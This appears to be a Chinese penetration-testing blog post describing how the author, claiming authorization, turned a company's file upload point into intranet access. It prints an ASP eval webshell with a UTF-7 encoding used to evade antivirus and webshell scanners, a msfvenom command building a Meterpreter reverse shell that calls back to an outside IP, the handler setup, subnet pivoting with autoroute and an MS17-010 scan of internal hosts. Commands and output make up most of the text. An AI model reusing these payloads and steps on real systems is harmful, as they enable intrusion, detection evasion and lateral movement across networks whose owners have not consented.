从某公司文件上传到内网漫游

首先渗透的站点是有授权的,并且以下触及关键点都有模糊化处理。

今天拿到一个某公司文件上传点,就尝试一波getshell,最后成功进入内网,这里记录一下思路和操作。对于大佬来说应该都很基础,但是对于我这个划水混子来说还是学到了一些东西。

这个站我拿到的时候就直接是一个文件上传点了,通过对这个站点分析得知应该是由一个文件遍历漏洞找到的文件上传点

上传一句话木马连接shell

就想着能不能上传一个木马连接shell,尝试上传了普通的asp一句话木马,蚁剑刚测试连接成功就断开,上传页面也显示文件被删除。

有朋友上传了免杀asp大马感觉用起来不方便,也不稳定,所以就构造asp的免杀一句话木马

一个密码为”LandGrey”的原始ASP一句话脚本代码如下

1
2
<%@codepage=65000%>
<%response.codepage=65001:eval(request("LandGrey"))%>

参考免杀webshell

UTF-7编码后如下

1
2
3
4
<%@codepage=65000%>
<%
+AHIAZQBzAHAAbwBuAHMAZQAuAGMAbwBkAGUAcABhAGcAZQA9ADYANQAwADAAMQA6AGUAdgBhAGwAKAByAGUAcQB1AGUAcwB0ACgAIgBMAGEAbgBkAEcAcgBlAHkAIgApACk-
%>

这种方式可以躲过较多webshell检测软件查杀,但是D盾Webshell查杀工具,提示脚本使用了UTF-7编码,并不能做到完全不被察觉。这里我感觉应该能绕过服务器内的查杀软件了

失败的提权过程

看了下ip发现是内网,用户为iis,尝试提权也失败了

查看运行的服务

存在360杀毒,所以之前的普通一句话木马都被杀了

内网漫游

在这里我考虑了很久,想打入内网我想到了三种方式。可以直接把数据转发出来本地代理渗透内网,但是目标主机是内网IP,还可以用lcx将内网主机3389端口转发到有公网IP的服务器上,我们再进行远程登陆,但是我没有windows服务器还没有足够的权限去实现,甚至还可以用msf生成木马直接连接,但是想到有360杀毒应该会被杀。

最后一种方式我试了一下,先在本地kali虚拟机生成一个连接到服务器的msf木马,再转发到本地macos通过蚁剑上传到目标内网windows上

1
2
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=45.77.124.165 lport=1234 -f exe -o red.exe
scp -p red.exe reder@172.22.163.184:~/

上传成功,竟然没被360杀掉还是比较意外

先通过蚁剑开启该木马再登陆服务器开启msf连接木马

1
2
3
4
5
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 45.77.124.165
set lport 1234
run

接下来就是获取目标网段信息,在MSF平台监听端,我们获取反弹的shell后(即session),我们可以直接在meterpreter控制终端进行目标网段信息的查询,具体查询命令如下

1
2
3
4
5
meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.255.4.0/255.255.255.0

添加目标网段路由

1
2
3
4
5
6
7
meterpreter > run autoroute -s 10.255.4.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.255.4.0/255.255.255.0...
[+] Added route to 10.255.4.0/255.255.255.0 via 218.70.16.163
[*] Use the -p option to list all active routes

路由查询

1
2
3
4
5
6
7
8
9
10
11
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
10.255.4.0 255.255.255.0 Session 4

我们将去往内网的路由打通后,接下来就可以使用MSF平台直接对内网主机扫描和进行各种高危漏洞的直接渗透利用了。

首先我们需要退到MSF攻击平台的操作面,为后面调用其他攻击模块做好准备,具体操作如下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
meterpreter > background
msf5 exploit(multi/handler) > sessions -i

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
4 meterpreter x64/windows IIS APPPOOL\ECI_EEMS @ WEBSRV3 45.77.124.165:1234 -> xx.xx.xx.xx:29007 (10.255.4.3)

msf5 exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.255.4.0/24
rhosts => 10.255.4.0/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 50
threads => 50
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

扫描了一下网段内MS17-010漏洞,过主机漏洞扫描,我们发现很多主机都存在MS17-010漏洞。

打完收工

到了这里我们可以做的事情就比较多了,内网的一切尽在掌握。自此我们使用的从传码到”MSF 的跳转路由转发”直接使用外网的MSF平台实现对内网私有主机的攻击实战结束。

后记

后面通过systeminfo查看了入口主机的补丁信息,利用Windows-Exploit-Suggester成功利用一处漏洞提权成功。

Thank you very much if you can.

欢迎关注我的其它发布渠道